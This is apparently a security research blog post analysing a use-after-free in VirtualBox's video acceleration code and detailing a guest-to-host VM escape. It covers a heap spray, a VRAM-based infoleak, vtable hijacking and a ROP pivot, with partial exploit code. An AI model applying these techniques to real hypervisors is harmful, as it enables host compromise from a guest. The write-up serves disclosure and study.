As part of my month-long internship at STAR Labs, I was introduced to VirtualBox and learnt much about bug hunting and triaging, root-cause analysis and exploitation. This post details a use-after-free bug I found during the internship, and the specifics of the VM escape exploit that I wrote using it. The latest version at the time of reporting was VirtualBox 6.1.2 r135662.

Setup

This blog post was written based on a Windows 10 host, with a Windows 7 guest VM. This setup would be ideal for following along: the guest VM should be configured to use the VBoxVGA graphics controller with Enable 2D Video Acceleration checked.

Before any bug hunting or exploitation can occur, a debug environment should be set up to facilitate root-causing of crashes and exploit debugging. VirtualBox is protected by process hardening, so attaching a userland debugger to the release version of VirtualBox is non-trivial at best. Fortunately, VirtualBox is open-source software, and a non-hardened debug version can be built, which allows attaching with a debugger. In my case, my mentor anhdaden had a debug build of VirtualBox 6.1.0 r135406 with symbols, which was a great help in allowing me to dive straight into debugging.

Heeding the wise words of @_niklasb:

Finally, some knowledge of writing Windows kernel drivers will be required, as the exploit interacts with the host's emulated devices from within the guest, and these are only accessible from kernel-land. This was one of my references when writing my WDM driver. Deep knowledge of the topic is not necessary for following along with this exploit.

Background

The bug lies within the VirtualBox Video Acceleration (VBVA) feature that is provided by the Host-Guest Shared Memory Interface (HGSMI). To use this feature, the guest kernel driver maps the physical address 0xE0000000 to perform memory-mapped I/O (MMIO). The guest is expected to write a formatted HGSMI command into the VRAM buffer at that address, indicating which channel it is using along with other details. The guest then issues an out instruction to the I/O port VGA_PORT_HGSMI_GUEST (0x3d0) so that the emulated device begins processing the command. The details can be reversed from the HGSMIBufferProcess function. To avoid extra work, I made use of the code from another exploit in this attack surface, by voidsecurity.
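As a rough illustration of this write-then-notify flow, the sketch below models the VRAM aperture as a plain byte array and the port write as a stub. The header layout (hgsmi_hdr), the helper names, and the idea that the value written to the port is the buffer's offset within VRAM are all simplifying assumptions made for illustration; the real structures, including the checksummed tail, should be taken from VirtualBox's HGSMI headers.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define VGA_PORT_HGSMI_GUEST 0x3d0   /* port named in the post */

/* Simplified, assumed header: the real HGSMI buffer header carries more
 * fields and is followed by a tail containing a checksum. */
struct hgsmi_hdr {
    uint32_t data_size;     /* size of the payload that follows */
    uint8_t  flags;
    uint8_t  channel;       /* which HGSMI channel is addressed */
    uint16_t channel_info;  /* command within that channel */
};

/* Stand-ins for the mapped VRAM and the port write (hypothetical). */
static uint8_t  fake_vram[0x1000];
static uint16_t last_port;
static uint32_t last_value;

static void port_out32(uint16_t port, uint32_t value)
{
    /* A real guest driver would execute an `out` instruction here. */
    last_port = port;
    last_value = value;
}

/* Place header + payload at `offset` in VRAM, then notify the device. */
static int hgsmi_submit(uint32_t offset, uint8_t channel, uint16_t info,
                        const void *payload, uint32_t size)
{
    struct hgsmi_hdr hdr = { size, 0, channel, info };

    assert(payload != NULL || size == 0);
    if (offset > sizeof(fake_vram) ||
        sizeof(hdr) + (size_t)size > sizeof(fake_vram) - offset)
        return -1;                       /* would not fit in the aperture */

    memcpy(&fake_vram[offset], &hdr, sizeof(hdr));
    if (size != 0)
        memcpy(&fake_vram[offset + sizeof(hdr)], payload, size);
    port_out32(VGA_PORT_HGSMI_GUEST, offset);
    return 0;
}
```

In an actual driver, fake_vram would be replaced by the mapping of physical address 0xE0000000 and port_out32 by the platform's port I/O routine.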

The VBVA service is handled by the vbvaChannelHandler function. Various VBVA commands can be sent; the bug lies in the VBVA_VHWA_CMD command, which is used for Video Hardware Acceleration (VHWA). Tracing the function calls in the debugger reveals the actual handler for the VHWA commands.

vbvaChannelHandler
  |_ vbvaVHWAHandleCommand
      |_ vbvaVHWACommandSubmit(Inner)
          |_ pThisCC->pDrv->pfnVHWACommandProcess = Display::i_handleVHWACommandProcess
              |_ pFramebuffer->ProcessVHWACommand = VBoxOverlayFrameBuffer.ProcessVHWACommand
                  |_ mOverlay.onVHWACommand = VBoxQGLOverlay::onVHWACommand
                      |_ mCmdPipe.postCmd = VBoxVHWACommandElementProcessor::postCmd
                          |_ pCmd->setData
                          |_ RTListAppend(&mCommandList, &pCmd->ListNode);

* Once the command has been added to the list, it is then processed:

VBoxQGLOverlay::onVHWACommandEvent
 |_ mCmdPipe.getCmd
 |_ processCmd = VBoxQGLOverlay::processCmd
     |_ vboxDoVHWACmd = VBoxQGLOverlay::vboxDoVHWACmd
         |_ vboxDoVHWACmdExec = VBoxQGLOverlay::vboxDoVHWACmdExec 

VBoxQGLOverlay::vboxDoVHWACmdExec will be the most important function to begin analysis from, as it contains the meat of processing for the VHWA commands.

Vulnerability

Now that we’ve roughly familiarised ourselves with the code, we can dive into the vulnerable VHWA command. Within VBoxQGLOverlay::vboxDoVHWACmdExec, there are various commands that allocate, delete and operate on objects, which might be a familiar sight for CTF heap challenge junkies.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:4669

void VBoxQGLOverlay::vboxDoVHWACmdExec(void RT_UNTRUSTED_VOLATILE_GUEST *pvCmd, int /*VBOXVHWACMD_TYPE*/ enmCmdInt, bool fGuestCmd)
{
    struct VBOXVHWACMD RT_UNTRUSTED_VOLATILE_GUEST *pCmd = (struct VBOXVHWACMD RT_UNTRUSTED_VOLATILE_GUEST *)pvCmd;
    VBOXVHWACMD_TYPE enmCmd = (VBOXVHWACMD_TYPE)enmCmdInt;

    switch (enmCmd)
    {
...
        case VBOXVHWACMD_TYPE_SURF_CREATE:
        {
            VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pBody = VBOXVHWACMD_BODY(pCmd, VBOXVHWACMD_SURF_CREATE);
            Assert(!mGlOn == !mOverlayImage.hasSurfaces());
            initGl();
            makeCurrent();
            vboxSetGlOn(true);
            pCmd->rc = mOverlayImage.vhwaSurfaceCreate(pBody);
...
        case VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE:
        {
            VBOXVHWACMD_SURF_OVERLAY_UPDATE RT_UNTRUSTED_VOLATILE_GUEST *pBody = VBOXVHWACMD_BODY(pCmd, VBOXVHWACMD_SURF_OVERLAY_UPDATE);
            Assert(!mGlOn == !mOverlayImage.hasSurfaces());
            initGl();
            makeCurrent();
            pCmd->rc = mOverlayImage.vhwaSurfaceOverlayUpdate(pBody);
...

This vulnerability lies within VBOXVHWACMD_TYPE_SURF_CREATE. When provided with a VBOXVHWACMD_TYPE_SURF_CREATE command, VBoxVHWAImage::vhwaSurfaceCreate will be called, which can create a new VBoxVHWASurfaceBase object. A pointer to that VBoxVHWASurfaceBase object will be stored in the calling object’s mSurfHandleTable member, which is simply an array of pointers indexed by a handle.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2287

int VBoxVHWAImage::vhwaSurfaceCreate(struct VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
...
    VBoxVHWASurfaceBase *surf = NULL;
...
        if (format.isValid())
        {
            surf = new VBoxVHWASurfaceBase(this,
                                           surfSize,
                                           primaryRect,
                                           QRect(0, 0, surfSize.width(), surfSize.height()),
                                           mViewport,
                                           format,
                                           pSrcBltCKey, pDstBltCKey, pSrcOverlayCKey, pDstOverlayCKey,
#ifdef VBOXVHWA_USE_TEXGROUP
                                           0,
#endif
                                           fFlags);
        }
...
        handle = mSurfHandleTable.put(surf);
        pCmd->SurfInfo.hSurf = (VBOXVHWA_SURFHANDLE)handle;

However, when certain command flags are enabled, rather than creating a new VBoxVHWASurfaceBase object, surf is set to an existing VBoxVHWASurfaceBase object instead.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2287

int VBoxVHWAImage::vhwaSurfaceCreate(struct VBOXVHWACMD_SURF_CREATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
...
    VBoxVHWASurfaceBase *surf = NULL;
...
    if (pCmd->SurfInfo.surfCaps & VBOXVHWA_SCAPS_PRIMARYSURFACE)
    {
        bNoPBO = true;
        bPrimary = true;
        VBoxVHWASurfaceBase *pVga = vgaSurface(); /* == mDisplay.getVGA() == mDisplay.mSurfVGA */
...
                        surf = pVga;
...
        handle = mSurfHandleTable.put(surf);
        pCmd->SurfInfo.hSurf = (VBOXVHWA_SURFHANDLE)handle;

When this code path is followed, mSurfHandleTable will hold a reference to the mSurfVGA of the mDisplay object. However, this mSurfVGA member may be replaced by other operations, for example a resize. Following a screen resize, which can be triggered by the guest, the following code will be executed.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:3752

void VBoxVHWAImage::resize(const VBoxFBSizeInfo &size)
{
...
    VBoxVHWASurfaceBase *pDisplay = mDisplay.setVGA(NULL);
    if (pDisplay)
        delete pDisplay;
...
    pDisplay = new VBoxVHWASurfaceBase(this,
                                       dispSize,
                                       dispRect,
                                       dispRect,
                                       dispRect, /* we do not know viewport at the stage of precise, set as a
                                                    disp rect, it will be updated on repaint */
                                       format,
                                       NULL, NULL, NULL, NULL,
#ifdef VBOXVHWA_USE_TEXGROUP
                                       0,
#endif
                                       0 /* VBOXVHWAIMG_TYPE fFlags */);

While the mDisplay member’s mSurfVGA has been freed and updated with a new allocation, the mSurfHandleTable will still hold a pointer to the old freed VBoxVHWASurfaceBase object. This creates a use-after-free scenario as other VHWA commands like VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE can still access this freed pointer through its handle, for various operations.
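The lifetime problem can be reduced to a toy model: two owners of one pointer, only one of which is updated on resize. The sketch below uses made-up names (pool, vga, handle_table) and an `alive` flag instead of real heap frees, so it only demonstrates the bookkeeping mistake and is not VirtualBox code.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins; none of these names come from VirtualBox. */
struct surface { int alive; };

static struct surface  pool[4];          /* pretend heap */
static struct surface *vga;              /* plays the role of mSurfVGA */
static struct surface *handle_table[8];  /* plays the role of mSurfHandleTable */
static int next_handle = 1;
static int next_slot;

static struct surface *surface_new(void)
{
    assert(next_slot < 4);
    struct surface *s = &pool[next_slot++];
    s->alive = 1;
    return s;
}

static void surface_delete(struct surface *s) { s->alive = 0; }

/* SURF_CREATE with the primary-surface flag: reuse the VGA surface. */
static int create_primary(void)
{
    assert(next_handle < 8);
    handle_table[next_handle] = vga;     /* second owner, no refcount */
    return next_handle++;
}

/* Resize: delete and replace the VGA surface; the table is not touched. */
static void resize(void)
{
    if (vga)
        surface_delete(vga);
    vga = surface_new();
}

/* Returns 1 if the handle refers to a surface that has been deleted. */
static int handle_is_dangling(int h)
{
    return handle_table[h] != NULL && !handle_table[h]->alive;
}
```

Calling resize(), then create_primary(), then resize() again leaves the returned handle dangling, which mirrors the sequence of VBVA commands described here.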

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

int VBoxVHWAImage::vhwaSurfaceOverlayUpdate(struct VBOXVHWACMD_SURF_OVERLAY_UPDATE RT_UNTRUSTED_VOLATILE_GUEST *pCmd)
{
    VBoxVHWASurfaceBase *pSrcSurf = handle2Surface(pCmd->u.in.hSrcSurf); /*pSrcSurf = freed chunk*/
    AssertReturn(pSrcSurf, VERR_INVALID_PARAMETER);
    VBoxVHWASurfList *pList = pSrcSurf->getComplexList();
...

To trigger the resize from the guest kernel driver, we use a different VBVA command rather than the VHWA command (VBVA_VHWA_CMD). The VBVA_INFO_SCREEN command ends by calling resize, allowing us to trigger the use-after-free.

// src/VBox/Devices/Graphics/DevVGA_VBVA.cpp:2444

static DECLCALLBACK(int) vbvaChannelHandler(void *pvHandler, uint16_t u16ChannelInfo,
                                            void RT_UNTRUSTED_VOLATILE_GUEST *pvBuffer, HGSMISIZE cbBuffer)
{
...
    switch (u16ChannelInfo)
    {
...
        case VBVA_INFO_SCREEN:
            rc = VERR_INVALID_PARAMETER;
            if (cbBuffer >= sizeof(VBVAINFOSCREEN))
                rc = vbvaInfoScreen(pThisCC, (VBVAINFOSCREEN RT_UNTRUSTED_VOLATILE_GUEST *)pvBuffer);
            break;
...

From there, the call chain reaches the resize handler:

vbvaInfoScreen
 |_ vbvaResize
     |_ pThisCC->pDrv->pfnVBVAResize = Display::i_displayVBVAResize

Exploitation

Heap Spray

Given our use-after-free vulnerability, the first step to exploitation is to reclaim the freed allocation with another allocation that we control. Since our host is a Windows 10 machine, the host heap is managed by the low fragmentation heap (LFH), which makes the exact placement of any single allocation hard to predict. A semi-reliable way to reclaim our allocation is thus to find a primitive within the VirtualBox code that lets the guest make many allocations of the same size as a VBoxVHWASurfaceBase while also controlling their contents. The primitive used in the end was drvNATNetworkUp_AllocBuf, which is called when sending ethernet frames. Fortunately, my mentor already had code that used it for heap spraying, saving me much effort in understanding the ethernet protocol. All we need to know about the primitive is that it can allocate buffers with sizes aligned to 16 bytes, filled with data provided by the guest. The following diagram illustrates the use of this for heap spraying.
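A minimal sketch of the spraying loop might look like the following. The send_frame function is a hypothetical stand-in for whatever guest code emits an ethernet frame, the object size is left as a parameter because the post does not state it, and the assumption that the frame length maps directly onto the host allocation size is mine and would need checking in a debugger.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Round a size up to the next multiple of 16. */
static size_t round_up_16(size_t n)
{
    return (n + 15u) & ~(size_t)15u;
}

/* Fill `buf` with a repeated 8-byte pattern. */
static void fill_qwords(uint8_t *buf, size_t size, uint64_t value)
{
    assert(size % 8 == 0);
    for (size_t off = 0; off < size; off += 8)
        memcpy(buf + off, &value, sizeof(value));
}

/* Hypothetical transport: here it only counts the frames "sent". */
static unsigned frames_sent;

static void send_frame(const uint8_t *data, size_t size)
{
    (void)data;
    (void)size;
    frames_sent++;
}

/* Send `count` identical frames sized to match the freed object. */
static void spray(size_t object_size, uint64_t pattern, unsigned count)
{
    uint8_t frame[512];
    size_t size = round_up_16(object_size);

    assert(size <= sizeof(frame));
    fill_qwords(frame, size, pattern);
    for (unsigned i = 0; i < count; i++)
        send_frame(frame, size);
}
```

Filling every qword with the same value means the fake object's fields hold that value regardless of their exact offsets, which is convenient when the object layout is only partially known.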

rip control

With this heap spray, we have control over the vtable member of the corrupted VBoxVHWASurfaceBase object. So how can we use this to gain rip control?

When inspecting a valid vtable for VBoxVHWASurfaceBase, we notice that its only entry is a function pointer to the vector deleting destructor. So once we know the address of a memory region we can write to, we can write a fake vtable there, point the object's vtable member at it, and delete the VBoxVHWASurfaceBase object through the VBOXVHWACMD_TYPE_SURF_DESTROY VHWA command, giving us control of the instruction pointer rip.
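The effect of swapping the vtable pointer can be shown with a small C model of a single-slot vtable. The struct and function names below are illustrative only, and the "attacker" function simply returns a marker value instead of doing anything harmful.

```c
#include <assert.h>

struct object;
typedef int (*destructor_fn)(struct object *self);

/* Mimics a C++ object whose first member is the vtable pointer. */
struct object {
    const destructor_fn *vtable;  /* single slot: the deleting destructor */
    int payload;
};

static int real_destructor(struct object *self) { (void)self; return 0; }
static int attacker_target(struct object *self) { (void)self; return 0x1337; }

static const destructor_fn real_vtable[1] = { real_destructor };
static const destructor_fn fake_vtable[1] = { attacker_target };

/* What `delete obj` boils down to: an indirect call through slot 0. */
static int destroy(struct object *obj)
{
    assert(obj && obj->vtable);
    return obj->vtable[0](obj);
}
```

Once obj->vtable is pointed at fake_vtable, the same destroy() call lands in attacker_target. In the exploit, the fake table would live in guest-controlled memory whose host address is known.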

For now, we have to achieve an infoleak with our bug before we can proceed any further in the exploit.

Getting an infoleak

After many hours of looking through the various VHWA commands for one that might leak pointers back to the guest VRAM, I reached a dead end. With some prodding, anhdaden led me to a semi-reliable way of obtaining an infoleak. This technique is based on the VRAM MMIO buffer that the guest controls (described earlier). With my VM configured for 256 MB of video memory, the VRAM buffer has a whopping size of 0x10000000 bytes. With such a large size, it becomes much more feasible to guess the virtual address of this buffer in the host. Restarting the VM a few times, I noticed that the buffer was allocated at these few addresses.

start             end
0x00000000ACB0000-0x00000001ACB0000
0x00000000AEE0000-0x00000001AEE0000
0x00000000B4F0000-0x00000001B4F0000
0x00000000B1A0000-0x00000001B1A0000
0x00000000ADE0000-0x00000001ADE0000
0x00000000A670000-0x00000001A670000
0x00000000B0B0000-0x00000001B0B0000
0x00000000AC10000-0x00000001AC10000

With such large ranges, even if we guess an address like 0x00000000C000000, it still lands within the VRAM buffer! With this information, we could begin to build better primitives to leak DLL addresses, and maybe form arbitrary R/W primitives.
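To make the guess less hand-wavy, the observed mappings can be intersected to see which addresses fell inside the buffer on every run. The sketch below hard-codes the start addresses listed above and the 0x10000000-byte size; the function names are my own, and a handful of samples obviously does not guarantee the same window on another machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define VRAM_SIZE 0x10000000ull   /* 256 MB of video memory */

/* Start addresses observed across VM restarts (from the list above). */
static const uint64_t observed_starts[] = {
    0x0ACB0000, 0x0AEE0000, 0x0B4F0000, 0x0B1A0000,
    0x0ADE0000, 0x0A670000, 0x0B0B0000, 0x0AC10000,
};
#define N_OBSERVED (sizeof(observed_starts) / sizeof(observed_starts[0]))

/* Return 1 if `guess` lies inside every observed [start, start + size). */
static int guess_always_inside(uint64_t guess)
{
    for (size_t i = 0; i < N_OBSERVED; i++) {
        uint64_t start = observed_starts[i];
        if (guess < start || guess >= start + VRAM_SIZE)
            return 0;
    }
    return 1;
}

/* Compute the window [lo, hi) common to all observed mappings. */
static void common_window(uint64_t *lo, uint64_t *hi)
{
    assert(lo && hi);
    *lo = 0;
    *hi = UINT64_MAX;
    for (size_t i = 0; i < N_OBSERVED; i++) {
        uint64_t start = observed_starts[i];
        if (start > *lo)
            *lo = start;
        if (start + VRAM_SIZE < *hi)
            *hi = start + VRAM_SIZE;
    }
}
```

For these samples the common window is 0x0B4F0000 to 0x1A670000, so 0x0C000000 sits comfortably inside it while leaving most of the buffer above the guess.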

One small problem remains, however: although we know that an arbitrary address like 0x00000000C000000 is likely to be in our controllable VRAM buffer, we do not know the offset of this address from the start of the buffer. Fortunately, there is a way to figure this out.

Let’s look into the VBoxVHWAImage::vhwaSurfaceOverlayUpdate function which implements the VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE command. As the source code had many function calls that were actually inlined and other macros that were optimised after compilation, I found it easier to inspect the function with a decompiler.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  pSrcSurf = *(VBoxVHWASurfaceBase **)(*(_QWORD *)(_this + 72) + 8i64 * (unsigned int)*((_QWORD *)_pCmd + 4));
...
  pList = (__int64 ***)pSrcSurf->mComplexList;              /* [1] */
...
  if ( _bittest(&v24, 9u) )
  {
...
  }
  else
  {
...
    if ( _bittest(&v25, 0xEu) )
      *(_QWORD *)(pList + 0x18) = pSrcSurf;                 /* [2] */
...
}

Looking at line [1], pList is a pointer taken from the VBoxVHWASurfaceBase object pSrcSurf. With our heap spray, we can control the value of pList. Later on, in line [2], pList is dereferenced and the member at offset 0x18 is set to pSrcSurf, i.e. the address of the reclaimed object. If we set pList to point into our VRAM buffer, we will be able to leak a heap pointer! Furthermore, if pList = 0x00000000C000000, the pointer will be written to 0x00000000C000018. We can scan the VRAM for this change and calculate the base address of the VRAM buffer from the offset at which the pointer appears.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  for ( i = **(__int64 ***)pList; i != *(__int64 **)pList; i = (__int64 *)*i )
    VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(this, pDstSurf, (VBoxVHWASurfaceBase *)i[2], pCmd);
...

It should be noted that the first member of pList is expected to be a valid pointer to a singly linked list, or the VM will crash while traversing it, as shown in the code snippet above. Thus the address 0x00000000C000000 should contain a valid linked-list pointer. An easy fix, while we do not yet know the base address of the VRAM buffer, is to spray the VRAM with the value 0x00000000C000000, which reliably prevents this crash from occurring. With every qword holding that value, the list head points back at itself, so the traversal loop terminates immediately.

    uint64_t* v = (uint64_t*)&vram[0x1000];
    for (int i = 0; i < 0x6000000 / 8; i++) {
        v[i] = 0x00000000C000000;
    }
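After the spray and the overlay update, the guest can scan the sprayed region for the one qword that changed and derive the host base address from its position. The sketch below is a simplified take on that arithmetic; the function names are hypothetical, and it assumes the leaked pointer is the only value in the region that differs from the spray value.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define GUESS       0x0C000000ull  /* guessed host address, also the spray value */
#define LEAK_OFFSET 0x18ull        /* the write lands at pList + 0x18 */

/* Return the index of the first qword that no longer holds the spray
 * value, or -1 if nothing changed. */
static ptrdiff_t find_changed_qword(const uint64_t *region, size_t count)
{
    for (size_t i = 0; i < count; i++)
        if (region[i] != GUESS)
            return (ptrdiff_t)i;
    return -1;
}

/* `byte_offset` is the changed qword's offset from the start of VRAM.
 * Its host address is GUESS + LEAK_OFFSET, so the base follows directly. */
static uint64_t vram_host_base(uint64_t byte_offset)
{
    assert(byte_offset <= GUESS + LEAK_OFFSET);
    return GUESS + LEAK_OFFSET - byte_offset;
}
```

Since the spray above starts at vram[0x1000], the byte offset passed to vram_host_base would be 0x1000 plus eight times the index returned by the scan. The changed qword itself is the leaked heap pointer.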

DLL infoleak

At this point, we know the base address of our VRAM buffer, and we also have a leak into the heap. With this information alone, we still cannot change rip to a meaningful address. We will need to create a DLL infoleak, enabling us to pivot into a ROP chain and gain code execution meaningfully. To achieve this, I made use of the VBOXVHWACMD_TYPE_SURF_OVERLAY_UPDATE yet again.

// src/VBox/Frontends/VirtualBox/src/VBoxFBOverlay.cpp:2823

signed __int64 __fastcall VBoxVHWAImage::vhwaSurfaceOverlayUpdate(__int64 _this, uint8_t *_pCmd)
{
...
  for ( i = **(__int64 ***)pList; i != *(__int64 **)pList; i = (__int64 *)*i )
    VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(this, pDstSurf, (VBoxVHWASurfaceBase *)i[2], pCmd);
...

As shown before, VBoxVHWAImage::vhwaSurfaceOverlayUpdate traverses the singly-linked-list pointed to by the first member of pList (which we control) and calls VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate on the VBoxVHWASurfaceBase pointer located at offset 0x10 of each linked-list node.
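Read back into C, the decompiled loop walks a circular list through a sentinel: it starts at the node after the one that the first member of pList points to, and stops when it comes back around. The struct layout below is inferred from the decompilation for a 64-bit build (next pointer at offset 0, surface pointer at offset 0x10); the field and function names are my own, and the middle field is unknown.

```c
#include <assert.h>
#include <stddef.h>

/* Node layout implied by the loop: `*i` is the next node, `i[2]` the surface. */
struct node {
    struct node *next;     /* +0x00 */
    void        *unknown;  /* +0x08, purpose not determined */
    void        *surf;     /* +0x10 */
};

/* First member of pList: a pointer to the sentinel node. */
struct surf_list {
    struct node *head;
};

/* Collect the surface pointers the loop would visit, up to `max`. */
static size_t collect_surfaces(const struct surf_list *list,
                               void **out, size_t max)
{
    size_t n = 0;

    assert(list && list->head && out);
    for (struct node *i = list->head->next;
         i != list->head && n < max;
         i = i->next)
        out[n++] = i->surf;
    return n;
}
```

A sentinel whose next pointer refers to itself yields zero iterations, while a chain of fake nodes placed in VRAM makes the host call vhwaDoSurfaceOverlayUpdate once per node on a pointer of our choosing.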

__int64 __fastcall VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate(__int64 _this, VBoxVHWASurfaceBase *_pDstSurf, VBoxVHWASurfaceBase *_pSrcSurf, _DWORD *pCmd)
{
...
  if ( _bittest(&v9, 0xCu) )
  {
    result = _pSrcSurf->field_90;
    _pSrcSurf->field_78 = result;
  }
...
}

Within VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate, the above operation is done, where we control the value of pointer _pSrcSurf. From the small code snippet above, we can see that we’ll be able to copy a value from a certain memory address to a slightly lower memory address. But how is this useful to us?

In some more slides from @_niklasb, he mentions that on Windows hosts, the memory region directly adjacent to the VRAM buffer is another region containing certain metadata about the VRAM buffer itself. We can verify this in the debugger, and the region indeed has R/W permissions. Combining this with the primitive we’ve just discussed, we can repeatedly copy the "VRam" pointer (which points within VBoxDD.dll) to a lower address. Since this metadata sits right next to our VRAM buffer, which is readable from the guest, we just need to “drag” this DLL pointer over the page boundary into our VRAM. Then we can simply read the pointer from memory!

The implementation detail is slightly complicated, but the general idea is to form a valid linked-list within the VRAM ourselves, which repeatedly calls VBoxVHWAImage::vhwaDoSurfaceOverlayUpdate on decreasing addresses.
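The dragging can be simulated on a flat byte buffer. The sketch assumes, from the decompiled field names, that the primitive copies 8 bytes from offset 0x90 to offset 0x78 of the fake surface, so each use moves the value 0x18 bytes lower. The buffer, the boundary and the helper names are all hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SRC_FIELD 0x90u                 /* field read by the primitive */
#define DST_FIELD 0x78u                 /* field written by the primitive */
#define STEP (SRC_FIELD - DST_FIELD)    /* 0x18 bytes moved per copy */

/* One use of the primitive on a fake surface located at mem + surf_off. */
static void copy_step(uint8_t *mem, size_t surf_off)
{
    uint64_t v;
    memcpy(&v, mem + surf_off + SRC_FIELD, sizeof(v));
    memcpy(mem + surf_off + DST_FIELD, &v, sizeof(v));
}

/* Copies needed until the whole 8-byte value lies below `boundary`. */
static size_t steps_needed(size_t ptr_off, size_t boundary)
{
    if (ptr_off + 8 <= boundary)
        return 0;
    return (ptr_off + 8 - boundary + STEP - 1) / STEP;
}

/* Drag the value at `ptr_off` downwards; returns its final offset. */
static size_t drag_pointer(uint8_t *mem, size_t ptr_off, size_t boundary)
{
    size_t n = steps_needed(ptr_off, boundary);

    /* Conservative check that every fake surface starts inside `mem`. */
    assert(ptr_off >= SRC_FIELD + n * STEP);
    for (size_t k = 0; k < n; k++) {
        copy_step(mem, ptr_off - SRC_FIELD);   /* surface placed so +0x90 hits the value */
        ptr_off -= STEP;
    }
    return ptr_off;
}
```

In the exploit, each copy_step corresponds to one linked-list node whose surface pointer is set 0x90 bytes below the current position of the value. Every step also leaves a copy of the value behind, which is the trail of excess pointers in the metadata region.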

As a bonus, this technique looks very satisfying in the memory dump :D

If left this way, the excess pointers that clobber the metadata lead to a BSOD on the host. The same technique should be repeated, but this time to null out the excess pointers.

rop2win

With a DLL leak attained, we can now write a ROP chain that calls VirtualAlloc to allocate an RWX region, copies our shellcode into it and jumps to it. To find a way to pivot from the destructor call to our ROP chain, we can first set rip to an invalid value to force a crash and inspect the state of the registers. In this case, rax points into our VRAM buffer. The following gadget can thus be used to pivot to our ROP chain.

In 6.1.2 r135662 (Release ver.)

0x0000000180042b3e: xchg eax, esp; ror byte ptr [rax - 0x75], 0x5c; and al, 0x30; add rsp, 0x20; pop rdi; ret;
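To work out where the first ROP gadget address has to be placed, the stack-pointer effects of this pivot can be modelled in a few lines. The sketch only tracks rsp; the intermediate ror and and instructions are treated as side effects and are not modelled, and the function name is my own.

```c
#include <assert.h>
#include <stdint.h>

/* Models only the stack-pointer effects of:
 *   xchg eax, esp ; ... ; add rsp, 0x20 ; pop rdi ; ret
 * and returns the address from which `ret` fetches the next gadget. */
static uint64_t first_gadget_slot(uint64_t rax)
{
    /* xchg eax, esp keeps only the low 32 bits, so the pivot target
     * must be an address below 4 GiB. */
    assert(rax <= UINT32_MAX);

    uint64_t rsp = (uint32_t)rax;  /* 32-bit write zero-extends into rsp */
    rsp += 0x20;                   /* add rsp, 0x20 */
    rsp += 8;                      /* pop rdi consumes one qword */
    return rsp;                    /* ret reads the next address here */
}
```

Under this model the qword at rax + 0x20 ends up in rdi and the chain proper starts at rax + 0x28. The 32-bit exchange is workable here because the VRAM addresses observed earlier all lie below 4 GiB.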

With this, our exploit chain is complete! Because the exploit clobbers the metadata, the VM is not able to continue gracefully; however, we can still spawn our calc!

References